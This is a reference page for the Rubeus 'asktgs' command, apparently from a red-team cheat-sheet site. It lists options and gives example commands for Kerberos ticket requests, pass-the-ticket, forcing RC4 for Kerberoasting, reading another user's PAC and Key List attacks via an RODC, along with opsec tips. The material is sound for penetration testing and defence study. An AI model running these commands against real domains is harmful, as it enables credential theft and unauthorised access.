🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🎟️ Rubeus / asktgs

asktgs

Request service tickets (TGS) using an existing TGT. Builds raw TGS-REQ/TGS-REP traffic.

Usage

Rubeus.exe asktgs </ticket:<ticket> | /ticket:<file>.kirbi> </service:<spn1>,<spn2>,...> [/enctype:DES|RC4|AES128|AES256] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:<ticket> | /tgs:<file>.kirbi> [/targetdomain:<domain>] [/u2u] [/targetuser:<target-user>] [/servicekey:<hash>] [/asrepkey:<key>] [/proxyurl:https://KDC_PROXY/kdcproxy]

Omit /ticket to request via LSA (uses current session TGT β€” opsec-friendly, works with Credential Guard):

Rubeus.exe asktgs /service:<spn> [/luid:<luid>] [/nowrap]

Options

  • /ticket:<ticket> β€” base64 TGT blob or path to .kirbi file
  • /service:<spn> β€” one or more SPNs, comma-separated
  • /enctype:RC4|AES128|AES256|DES β€” force specific encryption type
  • /dc:<dc-ip> β€” domain controller to send request to
  • /ptt β€” pass-the-ticket, apply to current session
  • /outfile:<output> β€” save ticket to file
  • /nowrap β€” don't line-wrap base64 output
  • /opsec β€” form TGS-REQ inline with genuine requests (AES256 only by default)
  • /enterprise β€” treat SPN as enterprise principal (user@domain.com)
  • /autoenterprise β€” auto-retry with enterprise principal on failure
  • /tgs:<ticket> β€” supply additional TGS for constrained delegation scenarios
  • /targetdomain:<domain> β€” force target domain for the request
  • /u2u β€” request user-to-user ticket
  • /targetuser:<target-user> β€” insert PA-FOR-USER to get PAC for any user (with /u2u)
  • /servicekey:<hash> β€” service key to decrypt and verify PAC
  • /asrepkey:<key> β€” AS-REP session key for decrypting U2U credential data
  • /printargs β€” print golden/silver forge arguments from decrypted PAC
  • /keyList β€” Kerberos Key List Request (requires RODC partial TGT)
  • /dmsa β€” request delegated managed service account ticket
  • /luid:<luid> β€” target logon session (LSA mode, elevated)
  • /proxyurl:<url> β€” use KDC proxy

Examples

# Request service tickets with a TGT
Rubeus.exe asktgt /user:<username> /rc4:<rc4>
Rubeus.exe asktgs /ticket:<ticket> /service:LDAP/<dc-ip>,cifs/<dc-ip> /ptt

# Force RC4 on AES-enabled account (for Kerberoasting downstream)
Rubeus.exe asktgs /ticket:<ticket> /service:<spn> /enctype:rc4

# User-to-user to read PAC of target user
Rubeus.exe asktgs /u2u /targetuser:<target-user> /ticket:<ticket> /tgs:<ticket>

# LSA mode β€” no ticket needed, uses current session
Rubeus.exe asktgs /service:LDAP/<dc-ip> /nowrap

# Request local machine TGT via LSASS renewal (admin)
Rubeus.exe asktgs /service:krbtgt/<domain> /luid:0x3e7

# Key List Request via RODC
Rubeus.exe asktgs /keyList /service:KRBTGT/<domain> /ticket:<ticket>

Notes

  • LSA mode (no /ticket) is opsec-friendly β€” Kerberos traffic originates from LSASS
  • LSA mode required when Credential Guard is active
  • S4U, U2U, keyList, KDC proxy args ignored in LSA mode